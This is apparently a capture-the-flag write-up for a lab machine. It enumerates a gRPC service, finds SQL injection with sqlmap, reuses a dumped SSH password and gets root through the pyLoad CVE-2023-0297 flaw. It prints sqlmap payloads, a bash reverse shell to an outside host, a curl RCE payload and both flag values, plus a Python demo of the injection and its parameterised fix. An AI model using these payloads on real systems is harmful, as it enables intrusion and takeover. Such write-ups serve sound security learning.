Service overview

IP address: 10.10.11.214. Let's see what nmap shows:

Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 14:31 EDT
Nmap scan report for 10.10.11.214
Host is up (0.052s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
| ssh-hostkey: 
|   3072 91:bf:44:ed:ea:1e:32:24:30:1f:53:2c:ea:71:e5:ef (RSA)
|   256 84:86:a6:e2:04:ab:df:f7:1d:45:6c:cf:39:58:09:de (ECDSA)
|_  256 1a:a8:95:72:51:5e:8e:3c:f1:80:f5:42:fd:0a:28:1c (ED25519)
50051/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 143.21 seconds
$ nc 10.10.11.214 50051                                   
▒?��?�� ?

Looks like a gRPC service.

gRPC

Let's use grpc_cli. Build instructions are here:

Let's get information about the application and its methods.

$ ./grpc_cli ls 10.10.11.214:50051
SimpleApp
grpc.reflection.v1alpha.ServerReflection
$ ./grpc_cli ls 10.10.11.214:50051 SimpleApp -l
filename: app.proto
service SimpleApp {
  rpc LoginUser(LoginUserRequest) returns (LoginUserResponse) {}
  rpc RegisterUser(RegisterUserRequest) returns (RegisterUserResponse) {}
  rpc getInfo(getInfoRequest) returns (getInfoResponse) {}
}
$ ./grpc_cli type 10.10.11.214:50051 LoginUserRequest
message LoginUserRequest {
  string username = 1;
  string password = 2;
}   
$ ./grpc_cli type 10.10.11.214:50051 RegisterUserRequest
message RegisterUserRequest {
  string username = 1;
  string password = 2;
}
$ ./grpc_cli type 10.10.11.214:50051 getInfoRequest     
message getInfoRequest {
  string id = 1;
}

Let's try calling each method.

$ ./grpc_cli call 10.10.11.214:50051 RegisterUser "username: 'user', password: 'user'"
connecting to 10.10.11.214:50051
message: "Account created for user user!"
Rpc succeeded with OK status
$ ./grpc_cli call 10.10.11.214:50051 LoginUser "username: 'user', password: 'user'"
connecting to 10.10.11.214:50051
message: "Your id is 767."
Received trailing metadata from server:
token : b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidXNlciIsImV4cCI6MTY4OTExMjA2Mn0.lTZieINh0j7CSujCGiIMM1EuQJY6ZcBXDlF7BqDNnyA'
Rpc succeeded with OK status

Judging by the NoneType error below, the application appears to be written in Python.

$ ./grpc_cli call 10.10.11.214:50051 getInfo "id: '1'" -metadata "token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"
connecting to 10.10.11.214:50051
Sending client initial metadata:
token : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc
Rpc failed with status code 2, error message: Unexpected <class 'TypeError'>: 'NoneType' object is not subscriptabl
$ ./grpc_cli call 10.10.11.214:50051 getInfo "id: '424'" -metadata "token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"
connecting to 10.10.11.214:50051
Sending client initial metadata:
token : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc
message: "Will update soon."
Rpc succeeded with OK status

Let's use the graphical front-end grpcui - https://github.com/fullstorydev/grpcui

$ ./grpcui --plaintext 10.10.11.214:50051
token    b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc'

grpcui

Let's try supplying the token and logging in (as in the previous step).

We get a NoneType error.

Let's save the request from BurpSuite as getInfo.req so we can try it with sqlmap:

Check it with sqlmap:

$ sqlmap -r getinfo.req -p data --risk 3
...
sqlmap identified the following injection point(s) with a total of 239 HTTP(s) requests:
---
Parameter: JSON #2* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"-4808 OR 2579=2579"}]}

    Type: time-based blind
    Title: SQLite > 2.0 OR time-based blind (heavy query)
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"424 OR 9114=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))"}]}

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWRtaW4iLCJleHAiOjE2ODkxMTM4Nzh9.guIZNYmKATLWgTSlE5i6wKnNPJDAfuYUlXGg5Wf6FSc"}],"data":[{"id":"424 UNION ALL SELECT CHAR(113,122,98,118,113)||CHAR(117,121,85,73,86,98,115,69,99,86,109,104,100,76,118,103,115,81,99,85,120,82,77,68,81,80,105,120,72,107,69,72,117,74,84,110,108,119,110,84)||CHAR(113,112,118,118,113)-- wLwQ"}]}
---
...

An SQL injection was found (union, boolean-based blind, time-based blind). Let's dump the database:

$ sqlmap -r getinfo.req -p data --risk 3 --dump-all
...
Table: accounts
[2 entries]
+------------------------+----------+
| password               | username |
+------------------------+----------+
| admin                  | admin    |
| HereIsYourPassWord1431 | sau      |
+------------------------+----------+
...
Table: messages
[1 entry]
+----+----------------------------------------------+----------+
| id | message                                      | username |
+----+----------------------------------------------+----------+
| 1  | The admin is working hard to fix the issues. | admin    |
+----+----------------------------------------------+----------+
...
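The injection above lives in the `id` field of `getInfoRequest`, which the server concatenates straight into its SQLite query. The following is an added illustration, not the box's real code or database: a constructed in-memory copy of the dumped `messages` table, a lookup written the vulnerable way, and the same lookup written with a bound parameter, so the boolean-based payload sqlmap reported can be seen to change the WHERE clause in one case and to be compared as a plain value in the other.

```python
import sqlite3


def make_db():
    """Constructed sample data modelled on the dumped 'messages' table
    (plus the row id 424 returned 'Will update soon.'); not the real db."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (id INTEGER, message TEXT, username TEXT)")
    conn.execute(
        "INSERT INTO messages VALUES "
        "(1, 'The admin is working hard to fix the issues.', 'admin'), "
        "(424, 'Will update soon.', 'admin')"
    )
    conn.commit()
    return conn


def get_info_vulnerable(conn, id_value):
    """String concatenation: the request's 'id' becomes part of the SQL text,
    so '-4808 OR 2579=2579' turns the WHERE clause into a tautology."""
    rows = conn.execute(
        "SELECT message FROM messages WHERE id = " + id_value
    ).fetchall()
    return sorted(r[0] for r in rows)


def get_info_fixed(conn, id_value):
    """Bound parameter: the driver hands the value to SQLite separately from
    the statement, so the payload is compared literally against the id column
    and matches nothing. The int() check rejects non-numeric ids up front."""
    if not id_value.lstrip("-").isdigit():
        return []
    rows = conn.execute(
        "SELECT message FROM messages WHERE id = ?", (int(id_value),)
    ).fetchall()
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    db = make_db()
    payload = "-4808 OR 2579=2579"  # boolean-based payload from the sqlmap output
    print("vulnerable, id=424:", get_info_vulnerable(db, "424"))
    print("vulnerable, payload:", get_info_vulnerable(db, payload))
    print("fixed, id=424:      ", get_info_fixed(db, "424"))
    print("fixed, payload:     ", get_info_fixed(db, payload))
```

The vulnerable variant returns both rows for the payload, which is exactly the true/false difference sqlmap's boolean-based technique relies on; the parameterised variant returns only the row whose id is literally 424.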

SSH

Let's try reusing the password from the database to connect over SSH.

$ ssh sau@10.10.11.214
HereIsYourPassWord1431
-bash-5.0$ id
uid=1001(sau) gid=1001(sau) groups=1001(sau)

User flag

-bash-5.0$ ls -la
total 44
drwxr-xr-x 5 sau  sau  4096 Jul 11 17:31 .
drwxr-xr-x 3 root root 4096 Jan 11 18:10 ..
lrwxrwxrwx 1 root root    9 Jan 11 18:08 .bash_history -> /dev/null
-rw-r--r-- 1 sau  sau   220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 sau  sau  3771 Feb 25  2020 .bashrc
drwx------ 2 sau  sau  4096 Jan 11 17:43 .cache
drwxrwxr-x 3 sau  sau  4096 Jul 11 11:23 .local
-rw-r--r-- 1 sau  sau   807 Feb 25  2020 .profile
drwx------ 2 sau  sau  4096 Jul 11 11:01 .ssh
-rw------- 1 sau  sau  1125 Jul 11 17:31 .viminfo
-rw-rw-r-- 1 sau  sau    55 Jul 11 14:25 bash.sh
-rw-r----- 1 root sau    33 Jul 11 10:42 user.txt
-bash-5.0$ cat user.txt 
ea0e2870b02b9c983ef9e371fb6e90e7

Privilege escalation

Let's see which ports are listening. There is an application on port 8000 bound to 127.0.0.1.

-bash-5.0$ netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:9666            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::50051                :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

Let's forward the port over SSH.

$ ssh -L 127.0.0.1:8000:127.0.0.1:8000 sau@10.10.11.214
HereIsYourPassWord1431

Let's look at the service in a browser:

There is a public exploit for an unauthenticated RCE vulnerability in this service: https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

# on the remote machine
$ nano /tmp/r.sh
bash -i >& /dev/tcp/10.10.14.220/443 0>&1
# on your own machine
$ nc -lnvp 443
$ curl -i -s -k -X 'POST' --data-binary 'jk=pyimport%20os;os.system(\"bash%20/tmp/r.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' 'http://127.0.0.1:8000/flash/addcrypted2'

Root flag

root@pc:~# ls -la
total 68
drwx------  7 root root  4096 Apr 27 15:32 .
drwxr-xr-x 21 root root  4096 Apr 27 15:23 ..
lrwxrwxrwx  1 root root     9 Jan 11 17:36 .bash_history -> /dev/null
-rw-r--r--  1 root root  3106 Dec  5  2019 .bashrc
drwxr-xr-x  3 root root  4096 Apr  4 10:25 .cache
drwxr-xr-x  3 root root  4096 Apr  4 10:25 .local
-rw-r--r--  1 root root   161 Dec  5  2019 .profile
drwxr-xr-x  7 root root  4096 Jan 11 17:21 .pyload
-rw-------  1 root root  3203 Apr 27 15:32 .viminfo
drwxr-xr-x  3 root root  4096 Apr 27 13:15 Downloads
-rw-r-----  1 root root    33 Jul 11 10:42 root.txt
drwx------  3 root root  4096 Jan 11 16:56 snap
-rw-r--r--  1 root root 24576 Jan 11 17:57 sqlite.db.bak
root@pc:~# cat root.txt
f09c10a5010a1e5e4d2bed5a61c864de